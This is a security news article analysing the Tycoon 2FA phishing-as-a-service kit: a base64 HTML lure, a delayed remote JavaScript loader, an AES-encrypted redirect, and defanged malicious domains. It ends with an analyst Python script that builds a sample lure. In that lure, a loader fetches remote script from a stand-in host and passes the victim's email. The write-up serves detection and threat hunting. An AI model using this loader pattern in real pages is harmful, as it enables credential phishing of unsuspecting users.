Thursday, January 23, 2025
Researchers Uncover Phishing-As-A-Service Domains Associated With Tycoon 2FA


The Tycoon 2FA platform is a Phishing-as-a-Service (PhaaS) tool that enables cybercriminals to easily launch sophisticated phishing attacks targeting two-factor authentication (2FA). 

The service simplifies the process for attackers and offers an intuitive interface for building customized phishing templates that mimic legitimate 2FA prompts.

Tycoon 2FA also automates the delivery and management of phishing campaigns, which significantly lowers the barrier to entry for large-scale, effective 2FA phishing attacks and makes the platform a serious threat to organizations and individuals.

HTML file sent to the victim.

Dynamic analysis reveals that the HTML lure displays a fake voicemail page before redirecting the victim to an Outlook phishing site, while static analysis shows that the HTML file contains a variable storing the victim's email address and a base64-encoded blob.

Decoding the blob reveals two parts: base64-encoded HTML for the fake voicemail page, and JavaScript code that is fetched from a remote server (disruptgive[.]com/res444.php) after a four-second delay, likely to carry out malicious actions on the victim's system.

Dynamic analysis of the HTML lure sent via email to the victim.

The PHP endpoint returns obfuscated JavaScript containing a Base64-encoded string; that string holds the values used for AES decryption: the key (B + D) and the IV (C).

A Python script decrypts the JavaScript, revealing its purpose: the decrypted script checks whether the string “VBsazFxAoBQotTgF” contains the character ‘#’.

If it does not, the script builds a link to https://mvz.nvkhytoypg[.]ru/9SIt8c/ concatenated with “VBsazFxAoBQotTgF”, replaces the page body with this link and simulates a click, effectively redirecting the user to the generated URL.

Decrypted JavaScript returned by the PHP URL.

This phishing campaign uses a multi-stage attack flow: the initial stage entices victims to click malicious links, which redirect them to credential-stealing phishing pages hosted on various domains.

By analyzing the attack flow, security researchers determined that the attackers delivered the malicious scripts through a PHP file named “res444.php.”

Parameters given to the second stage phishing URL

Validin's investigation revealed that this PHP file is used across multiple domains, indicating shared infrastructure. The attackers also used a generic template for the phishing pages, which provides another clue for identifying related domains.

By combining these findings and searching for specific parameters of the PHP file, security researchers can hunt for and disrupt the broader Tycoon 2FA infrastructure.
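As an added analyst-side example (not code from the article, the researchers or the kit), the following Python script reproduces the layered base64 decoding described for the HTML lure and pulls out the pivots the article hunts on: the victim-email variable, the remote loader URL, the setTimeout delay, and the PHP filename (res444.php). The sample lure, the example.invalid domain and the "||" separator between the two decoded parts are constructed assumptions; the real file's layout is not shown on the page.

```python
import base64
import re
import string

# Constructed sample lure modelled on the article's description (not the real file): a victim
# e-mail variable plus a base64 blob decoding to base64 decoy HTML and a delayed PHP loader.
DECOY_HTML = "<html><body><h1>You have a new voicemail</h1></body></html>"
LOADER_JS = ("setTimeout(function(){var s=document.createElement('script');"
             "s.src='https://example.invalid/res444.php?e='+victim;document.head.appendChild(s);},4000);")
INNER = base64.b64encode(DECOY_HTML.encode()).decode() + "||" + LOADER_JS
SAMPLE_LURE = ("<html><script>var victim='jane.doe@example.invalid';var p='"
               + base64.b64encode(INNER.encode()).decode() + "';document.write(atob(p));</script></html>")

B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # long base64-looking runs
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
DELAY_RE = re.compile(r"setTimeout\(.*?,\s*(\d+)\s*\)", re.S)  # heuristic: the timer argument

def decode_layers(text, max_depth=5):
    """Repeatedly decode embedded base64 that yields printable text; return every layer found."""
    layers, frontier = [text], [text]
    for _ in range(max_depth):
        new = []
        for blob in (b for layer in frontier for b in B64_RE.findall(layer)):
            try:  # re-pad, decode, and require UTF-8 text
                decoded = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True).decode()
            except (ValueError, UnicodeDecodeError):
                continue  # not valid base64, or a binary payload: skip it
            if all(c in string.printable for c in decoded) and decoded not in layers + new:
                new.append(decoded)
        if not new:
            break
        layers.extend(new)
        frontier = new
    return layers

def defang(url):
    """Render a URL safe to paste into a report: hxxps://host[.]tld/..."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

def extract_indicators(lure_html):
    """Collect the pivots the article hunts on: victim variable, loader URL, delay, PHP filename."""
    joined = "\n".join(decode_layers(lure_html))
    urls = sorted(set(URL_RE.findall(joined)))
    return {
        "victim_emails": sorted(set(EMAIL_RE.findall(joined))),
        "remote_urls": [defang(u) for u in urls],
        "delays_ms": sorted({int(d) for d in DELAY_RE.findall(joined)}),
        "php_loaders": sorted({u.rsplit("/", 1)[1].split("?")[0] for u in urls if ".php" in u}),
    }
```

The `php_loaders` value is the pivot the article describes: the same filename recurring across otherwise unrelated domains is what ties the infrastructure together.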

Aman Mishra
Aman Mishra is a security and privacy reporter covering data breaches, cybercrime, malware, and vulnerabilities.
